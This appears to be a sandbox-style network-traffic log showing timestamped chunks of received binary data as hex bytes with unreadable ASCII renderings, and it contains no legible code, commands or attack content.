                                                                                                                                                2022-09-29 12:51:58 UTC36076INData Raw: ba 57 e6 ca 13 c9 25 58 e3 a5 bb 34 e2 ed 75 18 fa 92 07 3d c4 91 6a b6 eb aa a8 2a 74 70 f5 1b f6 7f af 89 1f 00 24 f8 b2 83 ff 09 0c 0e 93 a2 43 01 ff 85 e7 d1 ba 96 4b 83 dc d0 86 ba 70 82 b2 19 61 40 c1 5d 2e ec 04 a7 3b 0a 8f 75 ed 73 a7 24 97 51 e2 1d ba 03 67 8d 5d 82 ba e7 4c de c1 af 49 2e ae b7 14 bc f3 a6 9a 27 8b c7 d0 c7 37 cb 2a cc cc 9e 29 64 c9 3d 15 14 8a 8c 1d 1e 4a 52 72 84 d5 d2 3e 29 17 cd 26 89 1b 7b c2 ed 57 d2 20 96 86 7a cd 6a 09 05 01 92 9a 2e c8 3c fa a0 e9 46 c9 4d d3 ee e9 c5 41 3f 50 a7 a8 66 e4 ad 1f 78 73 98 b4 65 b9 5c 69 15 24 c8 3b af fb bd d2 7b f2 7a 73 a2 8b ab bf 6a 2b dc 6e e1 fb ff 45 83 20 f9 80 28 7f 06 a8 37 47 01 6d 36 09 3e 2d c6 8e c3 ee 57 a0 75 9f ec 90 9d f7 b8 d2 f6 ce 99 7a 3d a1 26 d9 86 f8 78 95 29 e4
                                                                                                                                                Data Ascii: W%X4u=j*tp$CKpa@].;us$Qg]LI.'7*)d=JRr>)&{W zj.<FMA?Pfxse\i$;{zsj+nE (7Gm6>-Wuz=&x)
                                                                                                                                                2022-09-29 12:51:58 UTC36092INData Raw: d3 12 a5 87 e2 e1 6c d9 92 da d6 68 b2 73 41 f8 b4 35 22 a5 97 8e 0a 18 cf 90 df 54 f2 3c 39 f8 85 59 32 02 3d b7 b5 ec 72 2b f6 e2 ac 1f b5 5e cd f6 e7 63 01 2f 8f 8e 96 d7 64 b8 2b 8e 4b cb 91 05 d0 d6 67 9e b4 d5 f9 c5 f9 88 77 e5 22 fc 4d 08 5c 07 76 05 30 06 7e 6c 6d 13 82 5d 85 f5 9b 25 f0 d0 31 b4 2b 79 f6 70 9a ae 42 f6 35 9c d6 b5 e0 60 ac b4 f4 83 a3 4b 71 a4 1d 21 06 0f 59 d0 03 9b 3a ee 37 1f 20 3b d5 5b cd 77 c6 36 bc db 2f 11 80 4e 9c c5 f8 95 b6 8c 16 cf b4 a5 e9 18 50 78 ee d7 73 42 50 92 4b bf 01 22 05 43 73 ff e3 a7 4d 66 fa 9b c4 8b 2a a4 7b 5d 60 bd 60 af cb dc 47 9f b0 2c 69 7f b4 21 e5 5f f6 d0 b5 b5 25 a4 03 46 74 47 0e 04 f4 82 ef 6f 84 8c 82 66 65 0b 86 ff ef 60 15 85 80 7f 52 df 4b 24 5c 91 6e d9 bd 92 f5 16 c7 0d 9f 32 17 fc 02
                                                                                                                                                Data Ascii: lhsA5"T<9Y2=r+^c/d+Kgw"M\v0~lm]%1+ypB5`Kq!Y:7 ;[w6/NPxsBPK"CsMf*{]``G,i!_%FtGofe`RK$\n2
                                                                                                                                                2022-09-29 12:51:58 UTC36108INData Raw: 5b 69 23 2d cb c2 4c 44 dd 8a a8 0c 70 cb cf 54 9a 7a 22 57 bd 99 59 34 49 8c 73 c2 4f 3a d7 b7 35 eb 59 fc 6d 43 5c 61 e6 10 70 d8 42 ae dc 43 c9 86 ce a9 99 31 be df 96 6e ab 54 6e 21 b4 88 13 dd 24 6b a2 e1 83 c9 8b 97 4c a7 b1 67 1b e3 83 2f 0a 22 4f f6 98 35 70 27 a8 0c 3d b0 f8 8c af 09 c7 c9 e1 8a 35 c1 de ea 8f ed 41 af 87 a7 c2 2c bc 6e 5a ae c7 13 09 01 02 1f c0 d2 6c 05 de 48 20 ea 74 5a 6b d5 4d 54 4f 54 cb d5 34 dd 52 fa 79 b0 4c f2 bc 2d 48 5d fd 41 2e a0 5e 40 40 e1 a1 7b 7a 9c 10 31 26 9f 60 b2 85 93 db 48 50 ed 5b 94 05 81 58 b5 48 27 d3 d2 4e cf fd 4c ff cf f1 dc ec ff 1b 79 70 52 fa 34 9a 51 64 d1 68 5f 29 91 31 5d b1 ec ce fb 67 b8 5f 25 1b 32 a1 ab 62 f5 85 1d 11 17 19 eb 0e 40 62 5c f9 c0 8a d9 43 c4 24 99 3c 53 0b 3e a0 b2 9e fa 52
                                                                                                                                                Data Ascii: [i#-LDpTz"WY4IsO:5YmC\apBC1nTn!$kLg/"O5p'=5A,nZlH tZkMTOT4RyL-H]A.^@@{z1&`HP[XH'NLypR4Qdh_)1]g_%2b@b\C$<S>R
                                                                                                                                                2022-09-29 12:51:58 UTC36124INData Raw: 8a 17 6b 72 02 af cf 4e 9e 9c 7d 20 55 db a4 c2 27 72 4e 15 3d 3d 41 9d f0 db 7a 0a 6c e9 0a 0f 19 d7 fb 74 d7 4d 21 e2 01 de 59 ed c7 70 4e 73 e6 e3 cd 27 a5 4d 5d 22 7a f4 50 a7 45 64 c4 ca 65 7e 08 55 bc a8 88 a4 7a c5 5c b5 f6 74 a7 5d d2 49 3b 87 f2 ef d4 c3 41 9a 6d af 42 80 39 79 b0 44 5c 5a 3b ec 60 53 48 71 75 8e c0 89 f4 d6 b2 40 ed f4 13 ac 26 09 92 9f 8b 9e a4 77 ca 1c 85 77 6f d4 c2 48 19 61 89 7f a9 4e ab 2b 05 0b a6 7d 35 09 f6 1b 15 f4 29 59 8b 65 55 c6 b0 a3 f9 7c d3 bd 0e f4 2a d0 d1 92 63 4f 38 84 c3 ec ca 82 19 c9 cf 0d 11 7a ac ea ca 6c 8f d4 b2 45 29 7b f9 5e d9 81 17 0e 11 34 61 da 1d c8 c2 9b a5 e2 70 06 7c 9e c6 03 36 ca d3 f0 78 7a 46 10 30 64 44 65 d1 97 d0 42 49 b9 36 a4 54 81 0a 89 6b 9e 8e 64 5b ff c8 1d 67 95 f3 8d 44 19 07
                                                                                                                                                Data Ascii: krN} U'rN==AzltM!YpNs'M]"zPEde~Uz\t]I;AmB9yD\Z;`SHqu@&wwoHaN+}5)YeU|*cO8zlE){^4ap|6xzF0dDeBI6Tkd[gD
                                                                                                                                                2022-09-29 12:51:58 UTC36140INData Raw: fa 5f bf bc 45 cd 5e b8 1e 0a e5 43 e1 88 52 38 fc d8 5f af 12 d7 94 ff 73 9a 3c 07 b9 c9 5e ea 48 a3 50 43 84 a7 95 ed 88 56 ff 6e f4 69 99 8c 21 44 e0 cb 27 3d cf a7 aa f0 7e 6d 1a 9a 15 e6 75 f3 b7 7d f0 52 67 50 a1 b8 94 8d c8 8c b5 74 2f 61 e6 ad 7b 48 bf 16 45 91 96 cc 27 9d 09 01 ae f5 8c b5 de 92 b3 65 5d bc a5 5e b9 82 d8 fd bf 37 c0 46 07 e1 7b d1 49 43 52 7e 57 94 d8 ac 2a 86 65 05 b9 18 1f 02 46 cc 20 50 d6 e8 04 27 8e 9c 4e b7 f8 e6 1d 1c 68 3f 76 0b b3 39 64 24 37 a0 3d 42 8a 8d f4 6d fc 33 cd 36 21 54 30 6d 9a d1 2f 0f df 99 a9 9f 55 74 90 ab 75 57 7b 1f 72 54 a6 c2 2d 64 10 f7 bc a2 ce b7 70 0d 86 e8 3c 30 d9 6e 85 68 25 53 a6 f9 54 8e 17 01 f9 fe cf ad 92 58 2a 56 88 00 cd 0b 2e bd 39 23 35 63 01 ca e0 64 56 3c f5 1f ce 14 d1 d3 63 f0 49
                                                                                                                                                Data Ascii: _E^CR8_s<^HPCVni!D'=~mu}RgPt/a{HE'e]^7F{ICR~W*eF P'Nh?v9d$7=Bm36!T0m/UtuW{rT-dp<0nh%STX*V.9#5cdV<cI
                                                                                                                                                2022-09-29 12:51:58 UTC36156INData Raw: 29 4b d3 46 e1 49 af bd 3b 1c c7 c7 ba 49 f5 ce e9 d2 b8 d9 fc dc b8 a4 67 8e 2b a8 39 52 f8 a1 14 1b d2 cf c1 6f e4 e0 e1 2c 01 4b cd dc 74 73 2c e6 d8 1b 0d b2 e2 ec 50 bb cc 3a d7 02 61 83 57 2d fa 95 0a 6c f2 53 64 e7 ab 94 38 6a 7a 18 f9 71 f6 a3 73 1c 0c 23 b8 4e 4a 39 c2 43 f0 2d fd 59 bb af 6a b8 41 80 da 40 13 74 b5 92 cc 2a db 3a 00 b5 e8 40 79 db bd c9 00 c3 0f 7d 56 10 54 7f 6a c9 f3 7a 0b ba 32 02 fe 04 5e ff b8 3e 7e 0a 68 70 06 52 5f bf fe 50 3e 7d 75 fc 20 f5 de f8 0b fa 61 21 9b 1e 61 e5 4b e6 35 23 eb 84 74 70 9b f9 c9 ba 70 c9 16 db a6 0b 73 da aa b3 5b 78 6f 35 97 ab 38 3d 15 1a 9c 8a 2e f9 93 aa 5d fc 94 f5 b5 a3 2a 2d b7 2a 49 1f 87 ee 48 05 15 99 9f 03 c1 fb 02 1b d1 97 5b 2e 80 8f ff 55 e5 ee bb 42 77 f8 83 c8 5e 7e 5e 63 c4 5e 16
                                                                                                                                                Data Ascii: )KFI;Ig+9Ro,Kts,P:aW-lSd8jzqs#NJ9C-YjA@t*:@y}VTjz2^>~hpR_P>}u a!aK5#tpps[xo58=.]*-*IH[.UBw^~^c^
                                                                                                                                                2022-09-29 12:51:58 UTC36172INData Raw: 8e d2 83 c2 68 89 32 17 d8 6e c6 fd 38 ad 07 db d6 c5 73 63 92 a7 69 74 ab 4a 18 80 01 54 9d d1 b6 10 77 1f b4 1d 0b 35 da 65 c1 98 cc b5 14 40 28 27 be f0 bf fb df ed 1c 68 d0 eb 22 99 91 b1 72 64 06 d4 4f 31 c6 fc 37 33 c7 1e 5b 9f 74 9f b5 e0 bf f8 dd 9c 60 75 dc 5c 57 b5 5c 5c a3 74 2d 7e 24 03 e1 94 c1 22 79 e3 29 41 be 50 dc c0 e2 09 58 75 5d c1 48 1b 43 e1 27 c8 cb 51 d5 ca b8 2a 75 3d 20 97 27 ea 41 7b 39 b6 40 29 4a 28 fd 92 b0 e9 41 22 d4 2a a2 c7 55 d6 cb bf 97 7f b0 6f db e2 a7 eb 44 3f 45 10 c0 60 a7 36 a2 b5 67 73 92 c6 b0 4c f7 b4 b0 31 c4 61 4d d2 1b d4 b1 8d 9d 1b 21 94 a4 c4 be 56 ee 55 5c ae 46 72 c1 60 08 82 d9 cd d6 93 ba b7 1d 9e b6 7e 94 0e 4a 69 23 42 27 ae b3 03 59 7c 9d 0f df 44 7c ea 71 cb a0 4a ee 6c 52 39 c2 1c 4c c2 88 8a fb
                                                                                                                                                Data Ascii: h2n8scitJTw5e@('h"rdO173[t`u\W\\t-~$"y)APXu]HC'Q*u= 'A{9@)J(A"*UoD?E`6gsL1aM!VU\Fr`~Ji#B'Y|D|qJlR9L
                                                                                                                                                2022-09-29 12:51:58 UTC36188INData Raw: 29 ef 9c 82 c6 c3 e5 9c 5b 7a a0 64 69 3b ea 35 84 10 6c 71 3f b9 d5 9a 2b ec 52 94 a0 c5 a4 57 09 65 76 3c 5e 16 da c4 ff a1 8c bc 82 cd 2d df 22 14 15 e6 1e 9e b4 91 a3 a5 57 a7 03 9a bd 32 f4 a3 4b 68 1d ca b0 d9 10 e3 06 e9 95 66 58 3e 43 14 e9 82 e6 95 6c 71 70 e4 17 6e 45 36 3f a6 9a 94 4a 72 17 5d 9f e2 75 01 2c 8e 2a d3 62 5d 0a 00 db 33 25 2b a7 06 72 bd af a8 dc 80 68 b3 eb d3 c4 00 4d 8b 64 a5 ab 57 bc ac 2e 01 f6 5c 90 52 77 dd f0 d2 0f 4a ce a7 35 9b fb 9f 54 e4 da 27 2d 61 66 79 3d 1b f5 82 99 25 99 c7 e6 74 f4 ab 42 84 6a fa c6 ba 7e 56 3c 19 24 a6 6a 27 15 16 43 70 ae b0 3b 83 c8 24 b1 9f 58 a3 82 59 84 03 7d c4 bb 57 30 ca 6d 17 a0 a3 5d 9f 17 70 84 92 79 4c f2 80 d2 92 44 81 70 0b a2 4d db 88 89 2c ee c6 4a 8a 13 ca 75 84 54 27 95 e0 7f
                                                                                                                                                Data Ascii: )[zdi;5lq?+RWev<^-"W2KhfX>ClqpnE6?Jr]u,*b]3%+rhMdW.\RwJ5T'-afy=%tBj~V<$j'Cp;$XY}W0m]pyLDpM,JuT'
                                                                                                                                                2022-09-29 12:51:58 UTC36204INData Raw: 5a 4e 56 6f 7f 05 1e 63 2d c9 9c 2d fe 28 7a 11 29 32 4e 9e 0b ce aa 64 83 43 de f4 f3 a7 c1 3e 37 e8 4b ff 6d 46 73 e5 0c d6 21 60 a7 63 af 1d db 4f 01 d2 e3 64 0e 50 4a 5c 05 09 0e 0c e1 67 f6 54 d6 1f 35 ec 75 d6 a0 21 e2 81 6c 53 9e bf 5e 45 b1 31 92 20 04 bd 90 7d 0c b7 d4 ca c0 d9 53 37 b5 43 7c ad bf 0e c8 6b ff 76 bf 98 e9 65 f4 0a 2e 89 09 64 57 17 29 b2 97 96 92 5e 27 6a 2f 4e 34 2b 4f 34 56 54 a7 f5 08 24 0a 56 c6 4a 38 60 74 39 91 b1 94 cc 7e c1 0d 48 36 04 49 e0 79 fa ca 24 e4 5a fe 8b 4b f9 10 08 7f 48 d4 4e 7e b4 ac c8 69 f6 eb c7 29 f4 b5 e9 d9 e7 6d 16 b1 95 77 6d ed 03 6c ca 2b 53 24 e2 d8 b7 5a 62 7d 39 ea f1 ab b7 cb 69 2c 63 f4 6d e6 8f 83 c6 9e 18 2b ea 8c 7a 8d 59 b6 85 65 69 22 34 e4 ff f1 2e 9f 8d c9 00 58 4a 78 a7 2d 14 ee 10 9c
                                                                                                                                                Data Ascii: ZNVoc--(z)2NdC>7KmFs!`cOdPJ\gT5u!lS^E1 }S7C|kve.dW)^'j/N4+O4VT$VJ8`t9~H6Iy$ZKHN~i)mwml+S$Zb}9i,cm+zYei"4.XJx-
                                                                                                                                                2022-09-29 12:51:58 UTC36220INData Raw: 76 06 9f 7d 44 5a da a3 a6 fd b3 bc 25 05 2e a1 6d a4 f3 aa 5c 83 21 3a d0 fb 0e 2a 7d 3a 25 81 00 49 fe bb e2 4e 47 9d cd bc 01 6b ce b0 c9 48 66 66 2d ad 83 8d 7f ae 86 9c ac 89 48 a1 b8 e8 a1 a5 45 86 fb 3d e6 69 59 1b d2 14 90 15 8a cc b1 88 42 a6 01 b4 42 f1 25 31 6e 2f 3b 9a b8 c0 13 6e 9c 21 fe 34 54 ad 25 a8 8e 53 5c 6c fa 78 62 9a 0e 29 19 f6 1d 02 b1 29 74 12 eb 5d 97 42 eb f2 1f 6b 8e 58 20 81 f4 5f c1 00 52 62 f5 c4 e1 ba 43 ed 88 46 bd 96 82 84 e5 dc 75 a3 39 69 a9 9f b7 7b 78 47 13 6c c8 34 05 f9 bc bc 90 78 00 13 c0 c7 07 4e f0 2a fa ed 56 f3 6e 57 91 2b 36 20 8e ce f4 dc 61 13 f8 f0 7f 2a fd d7 96 26 f7 e9 4d 6c fb 10 d0 b3 21 e0 15 a4 51 87 48 85 76 f6 62 13 51 41 4f 1d 3d cf 20 47 97 ec 8c ed 99 8e ea d2 7f c2 52 62 8b 2b b3 68 64 94 a4
                                                                                                                                                Data Ascii: v}DZ%.m\!:*}:%INGkHff-HE=iYBB%1n/;n!4T%S\lxb))t]BkX _RbCFu9i{xGl4xN*VnW+6 a*&Ml!QHvbQAO= GRb+hd
                                                                                                                                                2022-09-29 12:51:58 UTC36236INData Raw: ad b2 61 ad b8 d9 18 62 2d f7 cf 29 68 0c 83 d9 ad ba 74 67 db 86 7b 8a 18 15 62 48 3f c2 89 52 1b d4 0a aa d0 f0 ec f2 a1 b3 24 be 6c 95 05 0f f2 b6 30 6f 7f a4 89 9e 14 c8 7c 0d 9c c7 65 2c 63 2c 7c 6e ec a7 08 56 19 4e 36 f8 34 70 ee 94 eb 1c fa ec 8d 5f 29 33 29 a6 d4 dd 94 d4 9e 70 f6 c5 38 1a 39 fb fa 1e 66 d0 c5 cb 90 0b bc f5 47 25 50 63 c1 c1 e1 af dd 42 8e 36 fd a7 16 43 81 fd 04 f3 ad 87 ea d5 b4 3b 6e f4 4d 09 e4 48 f5 ec 92 a2 e0 37 99 c4 43 3b 3a 6b 90 89 93 48 14 4c 25 4e 05 6c c2 eb cd 55 fb 72 5d f9 c2 52 e4 b7 6d a4 27 6a 43 9a 3a eb d8 6f 05 d9 61 f7 8f fe e4 36 79 cd 5b 2a c7 9f 6f a9 89 4c c2 75 21 73 3f e0 03 c9 be d5 9a 36 27 90 51 2c 7c e9 93 8c b5 15 f7 75 0b 8a c1 6c 54 90 1e 00 25 bf d0 44 d6 9b 9d 9a 72 98 14 7d a3 52 c8 3d f0
                                                                                                                                                Data Ascii: ab-)htg{bH?R$l0o|e,c,|nVN64p_)3)p89fG%PcB6C;nMH7C;:kHL%NlUr]Rm'jC:oa6y[*oLu!s?6'Q,|ulT%Dr}R=
                                                                                                                                                2022-09-29 12:51:58 UTC36252INData Raw: 54 57 17 f7 0d 0f 0b a4 6d 54 d9 99 d6 bb 06 1a 6c b0 aa 4e 68 73 1f 16 bf a3 77 c9 0b ae 77 7c 2e 69 1f 20 76 1c a9 c5 53 24 ea 9e 97 43 da e7 d9 61 f3 ab 6d e7 14 91 5c fe b3 49 42 0f 0c ab df b1 9d f9 e3 29 ff cf 0e 04 a9 26 b2 de 2a 0b 53 c0 77 68 cc eb b9 70 49 84 84 2a d8 8c 93 76 88 20 e9 9a e5 4d b0 9d 57 c0 d5 7a 5e 0f 35 e1 1d 2a 07 34 2c 0f 1b 08 41 c2 bc 3b 9f e4 0e a2 39 7e 15 29 a9 91 f4 97 df 2e 9b b6 5f bb 7c 62 99 66 0b 38 0e 16 ec e2 94 13 c5 aa 01 20 4f 70 73 4d 39 c9 71 08 7c 87 90 fe 18 4a 5a a8 e2 30 57 6f 3a 64 24 f5 ca ab 52 a9 b1 04 cc 3a 45 c3 d5 81 7b 18 39 e7 df a2 0b 43 9e 4e 5a ab 9f 3f c5 d8 38 9b 57 a8 4a 16 0c 7b dc 1d eb 3a df 08 21 21 51 36 6d 4e 44 ad 44 ee 8d 7c 36 c8 b5 bc 17 3a bc 56 c1 82 25 34 21 0e 36 08 60 03 6e
                                                                                                                                                Data Ascii: TWmTlNhsww|.i vS$Cam\IB)&*SwhpI*v MWz^5*4,A;9~)._|bf8 OpsM9q|JZ0Wo:d$R:E{9CNZ?8WJ{:!!Q6mNDD|6:V%4!6`n
                                                                                                                                                2022-09-29 12:51:58 UTC36268INData Raw: c9 24 d7 34 a5 a7 09 ed 86 44 30 d8 be 36 40 aa 7c 8f e2 3c 67 69 19 3f b7 97 3d b9 d6 a2 11 c4 b5 d7 de 8c 38 21 d8 9e bb a8 4b bc 4e 6e c7 7a 73 7e 73 3b 08 07 24 e4 08 39 e2 dc 87 36 54 2f aa 26 b4 c8 d8 1f 65 02 96 f2 fe 1e 37 67 a4 f9 4f 3d 64 34 0b 2f e9 76 58 e0 05 16 1d 87 0d d5 21 3c d8 94 47 23 d1 ba 02 9d 40 10 63 d0 3c 40 0f 4d bf a4 7e 29 65 6e 90 6f 38 f5 8b 59 29 af 47 9a f5 4f 5a c8 27 69 3c 57 87 c1 4a c3 02 27 24 79 5c cb 21 a8 7c 04 3a 20 91 26 18 59 a4 1d 77 9a 3d 7c e2 85 df ca b0 d5 9f 4b 45 6e 1f 5b 5f 43 30 84 9b d3 8c 48 07 4b c4 f9 c7 07 83 ce 18 3c e6 71 d3 1c c1 b8 02 92 83 9c 48 b8 f2 01 11 78 69 82 21 2f 05 15 ec cb 79 f4 95 ea f3 17 53 96 62 ec 5d 08 b3 93 d9 51 95 4c 87 18 3d 86 65 6a 8c 93 5f 2c fd 7f e9 70 06 f4 66 e3 70
                                                                                                                                                Data Ascii: $4D06@|<gi?=8!KNnzs~s;$96T/&e7gO=d4/vX!<G#@c<@M~)eno8Y)GOZ'i<WJ'$y\!|: &Yw=|KEn[_C0HK<qHxi!/ySb]QL=ej_,pfp
                                                                                                                                                2022-09-29 12:51:58 UTC36284INData Raw: 79 bd 83 2f bf 5f 9f d8 57 0a 99 3d 13 a6 a4 d3 53 2e b9 5c 0b 9a a4 47 0a 84 86 e5 7c a6 9e c6 9c 75 a1 08 3e 9c cd 36 e2 7c 1c b4 3e 11 3e 72 e8 72 d5 17 cd 88 4b b7 b1 a1 4e 3a a9 b3 17 28 e0 2a 33 87 73 b3 2f e8 43 13 cf 26 b8 10 46 4b 66 5f 79 bf c3 f4 84 16 53 d6 d0 ac f2 21 f9 68 d5 42 7d 64 40 68 d2 ae 82 b6 93 19 e8 8d f7 20 f3 56 e6 71 14 d6 9e 25 7f 99 54 8d 2e fa 1f b3 e2 58 69 d5 fe 5d d9 4c 69 ca 1e d6 6b 02 d3 d8 b3 7f 41 55 70 d2 41 3f 86 01 0e f8 2f be a7 66 9c 3b fa ae 32 1f 91 94 ac 98 da bb 9c a2 00 02 d1 9e ee 47 2f 8d 30 99 7b 81 36 16 34 6c cc e1 04 cc 84 91 65 ec 41 b8 ed cf 99 4b 56 fe 5a be 93 c2 49 98 09 43 f1 1e 89 94 74 81 9c 34 fb 10 8e 74 a8 9a 2c 38 f0 48 5a 93 33 1a 9d 41 f9 fe f4 9c 48 62 6c 66 84 54 33 64 ed 4a 54 ce 86
                                                                                                                                                Data Ascii: y/_W=S.\G|u>6|>>rrKN:(*3s/C&FKf_yS!hB}d@h Vq%T.Xi]LikAUpA?/f;2G/0{64leAKVZICt4t,8HZ3AHblfT3dJT
                                                                                                                                                2022-09-29 12:51:58 UTC36300INData Raw: 9f 07 15 f0 10 0c 59 a4 84 9f 2b 53 a5 ae 32 bd 2c d3 5e 9f 47 58 7f b9 2e 8c 0d a6 90 81 8a b8 a9 72 fe 8c cd 83 8b a3 48 bc c8 72 8f fc 82 fd 7c 6b 70 71 a3 76 88 d2 31 7d 49 22 55 75 04 79 62 4e 4d 8c 4b ff 9e 45 f7 92 a1 ee 0a 6a 71 9b 84 3f 0d 1f 7b d5 9d c3 a8 3e d0 35 85 09 3c 79 de a5 58 9b 61 83 fc 40 02 10 6c 06 14 13 dc e0 a5 30 f4 16 5a 80 83 bf 08 7f bc 60 55 c2 77 3e ea 00 1d 81 6c 63 0d f1 92 3e b3 ef c5 11 73 00 5f d2 26 a1 a2 25 f6 31 f6 75 39 d5 5b 92 59 e2 a1 02 a9 bd 78 fe 8e 09 22 8e ee 5c 7f 6c 76 95 89 ee 4a e1 92 0a a2 90 c4 35 ac b9 11 6b 38 66 4e 00 15 58 55 13 75 83 dc 6c ab 4b 2a 02 54 f7 5a 12 30 07 f4 5c b4 87 f0 79 d4 5c a1 17 e0 ae 0d f9 13 0b d5 ff 12 c7 3c c7 cc 3a b2 bc 3d 2d e5 f4 cb 24 3d 0a a8 2e 7d b6 55 83 36 2e f8
                                                                                                                                                Data Ascii: Y+S2,^GX.rHr|kpqv1}I"UuybNMKEjq?{>5<yXa@l0Z`Uw>lc>s_&%1u9[Yx"\lvJ5k8fNXUulK*TZ0\y\<:=-$=.}U6.
                                                                                                                                                2022-09-29 12:51:58 UTC36316INData Raw: 58 22 f3 84 6a 01 4d 9a d7 13 ff f0 56 95 d7 64 7c 76 6d b3 69 db fb c2 4b e6 c9 32 17 80 ad 18 5c ce 81 92 78 1f 33 14 49 70 c1 27 4f 39 8e 02 93 82 f7 72 43 1f fe 77 9a a0 8d a3 1b 9b c4 ee eb d3 b4 ef d3 81 91 f7 c2 f4 83 95 85 0c ac b7 b3 9a 0b a1 0d e7 66 b2 95 85 eb db 25 c2 37 ba 06 d3 c8 a7 11 21 ab b3 ff 9f 0b dd 8a bc 1b 09 e8 35 35 a8 22 11 84 a4 f5 cc d9 4b dd 0f 46 c9 00 8f 39 e3 0f 29 ab 4b 1b 0a de b6 28 41 c0 8f a3 22 ee b5 da cd c7 6d 2d 42 52 0a 78 fc 8b e9 64 a4 ef e7 9a b8 78 81 ab d5 02 22 db 61 fd 4c a2 87 e0 c6 51 e6 eb 9b 7e 41 98 df 6d c4 77 2c e9 84 74 98 b0 a3 28 56 00 dd db b9 90 b9 73 43 c6 32 7f a9 ce e2 06 26 81 67 db 7e 75 39 a0 e4 82 90 7b 36 13 2f 0e ad 0b 9f 50 22 7c 12 61 13 86 6c b3 ca 19 3d f1 64 4a 89 2f 33 6c 90 51
                                                                                                                                                Data Ascii: X"jMVd|vmiK2\x3Ip'O9rCwf%7!55"KF9)K(A"m-BRxdx"aLQ~Amw,t(VsC2&g~u9{6/P"|al=dJ/3lQ
                                                                                                                                                2022-09-29 12:51:58 UTC36332INData Raw: a4 69 70 b5 76 ba 83 11 3f 43 1c 4a 9b bb 3f 9e 36 cb 82 d4 19 40 e9 28 4f ec 8a 5d 5b 48 d0 cb ad 80 a8 5e 5f 3a 62 92 a2 12 c7 e7 58 e4 3d a7 eb b4 38 b2 34 84 d9 06 06 bd 11 02 ce 47 47 16 1d c3 f2 5d b2 f9 5c 91 6b d6 94 0c da 14 91 45 34 4c e6 0a fd 5e ff b9 ef 33 67 6d 83 44 30 b1 ab 21 b6 40 ee e3 d7 37 02 b5 1d 4a b5 16 f7 c3 84 e1 01 fd 8a d0 4f b5 d6 54 32 d8 bc e4 93 fb 04 69 52 c5 6b c3 0b f7 d2 a3 48 15 b9 ff cd 6c a6 36 69 ac 2f b9 fc 7d eb ed 61 f4 16 5f 63 41 d0 b5 e3 77 91 39 94 08 07 55 c5 26 b3 13 2a 48 6e da ec 16 91 b1 bd aa be 52 b7 b1 1e b2 9a 5b 8c 8d c7 26 25 1e bb 0a e5 97 16 93 2b ad 74 d5 0d 69 ce eb 85 79 e6 7a 26 fa 89 19 11 0a 60 95 24 42 a5 2f d1 fc 30 50 de be 47 38 ec 6d b5 7d 98 44 b0 ad e5 19 7c bc 61 27 eb df cd 9b bb
                                                                                                                                                Data Ascii: ipv?CJ?6@(O][H^_:bX=84GG]\kE4L^3gmD0!@7JOT2iRkHl6i/}a_cAw9U&*HnR[&%+tiyz&`$B/0PG8m}D|a'
                                                                                                                                                2022-09-29 12:51:58 UTC36348INData Raw: 0a 2f 11 e9 08 09 3c b6 b3 64 a3 c6 7d e6 1b d3 e9 3b d4 9e 33 15 be aa 1f 8d fa d9 2d 9a 47 a9 61 bc 3e bb ae 9d 12 5e 32 bd 11 08 c4 04 76 c3 37 26 da db 6c a8 4a 35 42 6c 8a a7 d6 3a fa 0b 07 28 aa 89 72 49 1f 14 59 74 23 d9 db 68 7a cd fc 94 47 7a 9a 7c 79 5a 70 f3 9e f6 f3 85 bd 65 8f 05 66 34 91 ab dd 34 a3 70 f7 f0 ed d1 70 c1 50 12 c0 b7 da 90 20 75 d7 8f 71 17 47 18 a1 fc ad a7 7e f1 1b f0 95 1d 15 e3 4a 87 92 67 07 f6 25 d3 40 bf df f1 6f 59 d4 1c 83 0c 0c 74 e9 97 3b f8 65 bd c3 2c bb 73 c5 33 9f 36 f0 62 a2 fa 42 08 a3 f4 c2 e1 70 ce fc db 30 1d 66 e9 98 51 15 16 4f ea 2f bf 55 dd 17 94 c0 4d ee fd 74 15 24 ae b9 77 37 cc 11 c2 ae 66 11 07 50 05 e7 88 88 c1 5f 31 86 ea 55 4b 40 20 c0 5c 8c 32 68 73 dc 49 61 96 21 01 35 f8 0a 95 f2 e1 7c 55 48
                                                                                                                                                Data Ascii: /<d};3-Ga>^2v7&lJ5Bl:(rIYt#hzGz|yZpef44ppP uqG~Jg%@oYt;e,s36bBp0fQO/UMt$w7fP_1UK@ \2hsIa!5|UH
                                                                                                                                                2022-09-29 12:51:58 UTC36364INData Raw: 78 9e 7f 2f bc cb 4c b6 f1 40 a5 35 2d 5f 4b 6f 8b 6d 7f 8c 48 84 c5 a5 82 c5 35 75 24 b0 14 0f 81 4b 0b 11 77 59 8d 77 c4 17 7a 13 8e 52 2c 61 6b 9d 3f e7 b2 4f e9 c4 c6 5d e5 2b fd ca d3 87 0d d9 27 ab b7 32 d3 61 5e b1 19 c9 b8 81 f1 1b 9c d9 16 de 76 fe 3b 47 8d 3e 83 e6 a9 b8 65 7c ab 29 1a 13 e5 a4 a3 fc 94 64 bf bf 7d 9a d9 5e f4 a7 68 6f d9 15 c0 f6 32 44 93 29 ed ae 24 44 27 30 3a 2d b7 46 3a 64 33 bd b6 dc 97 f5 59 cf 23 3d d8 58 01 09 d9 d7 8a 66 e6 2e b3 83 77 e6 e2 fa 2d af c7 35 bd 9b 2b f2 74 ed 57 ca f9 44 4b 0e df a0 c6 e5 d0 14 30 ec 5c 76 eb b7 20 5f 24 00 c9 d3 e9 67 98 57 d6 de ae 24 d9 f5 b6 8d f7 f1 dd 71 27 cc 0a e5 b2 d3 e3 b6 ae 1a bc ef a3 c6 74 86 7b e6 1a 2e 1f ec 93 f8 2f a1 ee c0 f6 2e 6a af 75 7f 6b 26 f7 2a 0f de 1a b8 07
                                                                                                                                                Data Ascii: x/L@5-_KomH5u$KwYwzR,ak?O]+'2a^v;G>e|)d}^ho2D)$D'0:-F:d3Y#=Xf.w-5+tWDK0\v _$gW$q't{./.juk&*
